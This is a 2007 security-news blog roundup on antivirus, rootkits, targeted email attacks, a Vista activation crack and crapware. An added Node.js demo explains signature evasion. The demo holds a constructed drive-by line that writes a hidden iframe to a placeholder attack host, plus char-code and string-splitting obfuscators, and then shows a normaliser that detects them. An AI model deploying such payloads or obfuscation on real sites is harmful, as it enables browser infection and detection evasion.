31 May, 2007
Landlord, one of our Geeks in Training, has done a mini-review of Eset's new Smart Security suite, now in beta. Smart Security adds a firewall and anti-spam filtering to the NOD32 anti-virus scanner.
I’ve just downloaded the new Eset Smart Security Beta to check it out, and see if Eset continue their tradition of low-memory consuming products. It offers anti-virus protection with the successful NOD32 engine along with a firewall and anti-spam protection. I haven’t checked its detection rates and success, but seeing as it’s based on the excellent NOD32 engine I know what to expect from it.
I’ve got a very good first impression: the interface is much better than it was in the original anti-virus product, which was very confusing and unfriendly. The new interface is uncluttered and better suited to the current Vista look.
3 May, 2007
GeekSquad, the well-marketed, much-advertised, but seldom-recommended tech support team at Best Buy, is no stranger to bad publicity. A GeekSquad agent was recently caught videotaping a client in the shower. Before that, Winternals sued the company for using unlicensed copies of its software.
Now current and former agents are joining the chorus. GeekSquadSecrets.com (registration required) has some interesting information. For example, there is a new "agent", Johnny Utah. He isn't an agent at all, but simply a remote connection to technicians in the Philippines and Malaysia. Plunk down $199 to have a virus or other malware removed, only to have the in-store tech hand your machine off to that remote session, walk away and collect your money?
2 May, 2007

Dino Dai Zovi, the New York-based security researcher who took home $10,000 for the highly-publicized MacBook Pro hijack on April 20, has said in an interview that he thinks Vista is more secure than Mac OS X.
From your research on both platforms, is there a winner between Mac OS X 10.4 and Vista on security?
I have found the code quality, at least in terms of security, to be much better overall in Vista than Mac OS X 10.4. It is obvious from observing affected components in security patches that Microsoft’s Security Development Lifecycle (SDL) has resulted in fewer vulnerabilities in newly-written code. I hope that more software vendors follow their lead in developing proactive software security development methodologies.
Contest winner: Vista more secure than Mac OS [MacWorld]
2 May, 2007

Respected security researcher Joanna Rutkowska promises to reveal new rootkit techniques for Vista, including kernel attacks that its TPM-backed BitLocker protection does not stop. On her blog she notes that there will be a training session for "legitimate companies" during the Black Hat Briefings in Las Vegas in late July. Note the distinction: the TPM and BitLocker protect the boot chain and data at rest; an attack that loads code into an already-running kernel sits outside what they are designed to prevent.
As the training will be focused on Windows platform and Vista x64 specifically, we will also present some new kernel attacks against latest Vista x64 builds. These attacks, of course, work on the fly and do not require system reboot and are not afraid of the TPM/Bitlocker protection. (Although they could also be used to bypass Vista DRM protection, this subject will not be discussed during the training)
Understanding Stealth Malware [invisiblethings]
19 Apr, 2007
Increasingly, the actual code used to attack PCs, often JavaScript, is hidden in Flash animations or scrambled so that anyone who examines the source of a page can't easily identify it, said Jose Nazario, a senior software engineer at Arbor Networks, in a presentation at the CanSecWest security confab here.
“Their obfuscation tools are primitive but effective,” Nazario said. “They use obfuscation to avoid simple signatures,” he said, referring to security techniques based on signatures to detect malicious Web sites. Signatures are fingerprints of known attacks.
Web attacks have become commonplace. Tens of thousands of Web sites attempt to install malicious code, according to StopBadware.org. The sites, the bulk of which are compromised sites, often drop a Trojan horse or other pest onto a PC through a security hole in the Web browser.
View: Full Story @ News.com
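The evasion Nazario describes, as an added Node.js example that is not part of the News.com story or Arbor's work: a raw-text signature for the write-an-IFRAME idiom, two of the "primitive" obfuscations that defeat it (char-code encoding and string splitting), and a static normaliser that peels those layers without executing the script so the same signature matches again. The payload, hostname and signature are constructed for the demonstration.

```javascript
// Added example (not from the News.com article or Arbor Networks): why a
// raw-text signature on page script fails against primitive obfuscation, and
// how a static normalising pass restores the match. Node.js, no dependencies.

// Constructed sample of the drive-by idiom the article describes: script that
// writes a zero-size IFRAME pointing at an attack server. The hostname is a
// placeholder, not a real site.
const PLAIN =
  `document.write('<iframe src="http://evil.example/x.php" width=0 height=0></iframe>');`;

// A "simple signature" of the kind Nazario means: a regex over the literal
// write-an-iframe idiom as it appears in the page source.
const SIGNATURE = /document\.write\s*\(\s*['"]<iframe/i;

function matchesSignature(text) {
  return SIGNATURE.test(text);
}

// Obfuscation 1: every character of the payload replaced by its char code and
// rebuilt at run time with eval(String.fromCharCode(...)).
function obfuscateCharCodes(src) {
  const codes = Array.from(src, (c) => c.charCodeAt(0)).join(",");
  return `eval(String.fromCharCode(${codes}));`;
}

// Obfuscation 2: the payload chopped into short string literals joined with +,
// so no signature-sized substring survives in the page source.
function obfuscateSplitStrings(src, chunk = 4) {
  const pieces = [];
  for (let i = 0; i < src.length; i += chunk) {
    pieces.push(JSON.stringify(src.slice(i, i + chunk)));
  }
  return `eval(${pieces.join("+")});`;
}

// Static normaliser: undo the tricks above WITHOUT executing the script,
// repeating until nothing changes, because obfuscators stack layers.
//   1. String.fromCharCode(<numeric list>)  ->  the decoded string literal
//   2. "a" + "b"                            ->  "ab"
//   3. eval("<string literal>")             ->  the literal's contents as code
// The literals produced here are valid JSON strings; anything JSON.parse
// rejects is left untouched rather than guessed at.
const RE_CHARCODE = /String\.fromCharCode\(([\d,\s]+)\)/g;
const RE_CONCAT = /"((?:[^"\\]|\\.)*)"\s*\+\s*"((?:[^"\\]|\\.)*)"/g;
const RE_EVAL = /eval\(("(?:[^"\\]|\\.)*")\)/g;

function normalise(text, maxRounds = 64) {
  let cur = text;
  for (let round = 0; round < maxRounds; round++) {
    const next = cur
      .replace(RE_CHARCODE, (_m, list) =>
        JSON.stringify(
          String.fromCharCode(
            ...list.split(",").filter((s) => s.trim() !== "").map((n) => parseInt(n, 10))
          )
        )
      )
      .replace(RE_CONCAT, '"$1$2"')
      .replace(RE_EVAL, (m, lit) => {
        try {
          return JSON.parse(lit);
        } catch {
          return m;
        }
      });
    if (next === cur) return cur;   // fixpoint: no layer left to peel
    cur = next;
  }
  return cur;
}

// Does the signature fire on the raw page text, and after normalisation?
function signatureDemo() {
  const samples = {
    plain: PLAIN,
    charcodes: obfuscateCharCodes(PLAIN),
    split: obfuscateSplitStrings(PLAIN),
    stacked: obfuscateCharCodes(obfuscateSplitStrings(PLAIN)),
  };
  const report = {};
  for (const [name, text] of Object.entries(samples)) {
    report[name] = {
      raw: matchesSignature(text),
      normalised: matchesSignature(normalise(text)),
    };
  }
  return report;
}

console.table(signatureDemo());
```

Only the plain sample trips the signature on raw text; after normalisation all four do. The normaliser is deliberately limited to the three patterns it names: real drive-by kits also use unescape, arithmetic on char codes, and data pulled from the DOM, which is why production analysis runs the script in an instrumented JavaScript engine rather than relying on regex rewriting.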
19 Apr, 2007
Rootkits–malicious software that operates in a stealth fashion by hiding its files, processes and registry keys–have grown over the past five years from 27 components to 2,400, according to McAfee’s Rootkits Part 2: A Technical Primer (PDF).
“The trend is it used to be rootkit A was used, but now it’s different components in different rootkit malware,” said Dave Marcus, security researcher and communications manager for McAfee Avert Labs. “Now, there are more ways attackers can use these components to hide their malware.”
Attackers use rootkits to hide their malicious software, which can range from spyware to keyloggers that steal sensitive information from users' computers. The rootkit can, for example, create a hidden directory that is kept out of view of the user's operating system and security software.
View: Full Story @ News.com
19 Apr, 2007
During March, MessageLabs intercepted 716 e-mail messages that were part of 249 targeted attacks aimed at 216 of its customers, the Gloucester, England-based provider of hosted e-mail filtering services said in a research report. Of the attacks, almost 200 consisted of a single malicious e-mail designed to infiltrate an organization, MessageLabs said.
“These numbers represent a significant increase when compared to the same period last year when attack rates reached one or two per day,” MessageLabs said.
Security experts have said that limited-scale attacks are the most dangerous. Widespread worms, viruses or Trojan horses sent to millions of mailboxes are typically not a grave concern because they can be blocked. But targeted Trojan horses, especially those aimed at specific businesses, have become nightmares as they can fly under the radar.
View: Full Story @ News.com
5 Mar, 2007
Pirate group Pantheon has released a working crack for Windows Vista that allows a pirated, non-activated installation of Vista (Home Basic, Home Premium and Ultimate) to be properly activated and made fully operational.
Unlike the cracks that have circulated since Vista RTM was released in late November, this one doesn't simply bypass product activation with beta activation files or time-stop cracks; it actually uses the activation process. Microsoft apparently allows large OEMs such as ASUS to ship machines with a pre-installed version of Vista that does not require product activation, on the grounds that end users would find it too inconvenient.
This version of Vista uses System-Locked Pre-Installation 2.0 (SLP 2.0), which lets the "Royalty OEMs" embed licensing information into the operating system so that Vista can activate without going back to Microsoft for verification. The licensing components are the OEM's BIOS-embedded ACPI_SLIC table (signed by Microsoft), an XML certificate file corresponding to that ACPI_SLIC table, and an OEM-specific product key. The check is satisfied entirely by data present on the local machine, with no call back to Microsoft, and that offline trust is what the crack exploits.
View: Full Story @ apcmag.com
18 Jan, 2007
In October 2005, Windows expert Mark Russinovich broke the news about a truly underhanded copy-protection technology that had gone horribly wrong. Certain Sony Music CDs came with a program that silently loaded itself onto your PC when you inserted the disc into a CD-ROM drive. Extended Copy Protection (or XCP, as it was called) stymied attempts to rip the disc by injecting a rootkit into Windows — but had a nasty tendency to destabilize the computer it shoehorned itself into. It also wasn’t completely invisible: Russinovich’s own RootkitRevealer turned it up in short order. Before long, Sony had a whole omelette’s worth of egg on its face, and the word rootkit had entered the vocabulary of millions of PC users.
The concept of the rootkit isn't new, and dates back to the days of Unix. An intruder would install a kit of common Unix tools, recompiled so that the intruder could keep administrative or root access without leaving traces behind. Rootkits, as we know them today, are programs designed to conceal themselves from both the operating system and the user, usually by performing end-runs around common system APIs. A legitimate program can do this too, but the term rootkit is normally reserved for something that does so with hostile intent, as a prelude to stealing information such as bank account numbers or passwords, or causing other kinds of havoc.
View: Full Story Via: EETimes
11 Jan, 2007
Earlier today Slashdot pointed me to a CBC article citing unnamed sources at Microsoft decrying the state of “craplets” on PCs. Just what are craplets? It’s a cute nickname for all of the software an OEM installs on your new Windows PC before it arrives on your doorstep. Think: 2 or 3 ISP sign-up applications, instant messengers out the wazoo, and software for updating all of this software. And a lot more. Check out the CBC article for more basic details on what craplets are and why they make people, including Microsoft, angry.
Why do we get craplets on our machines? The answer, as you probably could already guess, is that OEMs make money from crapware (a collective term for all craplets). Companies like RealNetworks or JASC Software will pay to have their applications (say, PaintShop Pro) pre-installed on a PC. It’s even more lucrative, sources tell us, when these applications can be established as default handlers for as many file types as possible. It’s advertising, OEM-style.
This is also partially how Microsoft got into trouble back in the days of Netscape vs. IE. Telling OEMs what to do turned out not to be as kosher as Microsoft thought, and they got a hand upside the head for it. Microsoft now complains that this puts them in the position of not being able to do anything about crapware.
View: Full Story Via: Ars Technica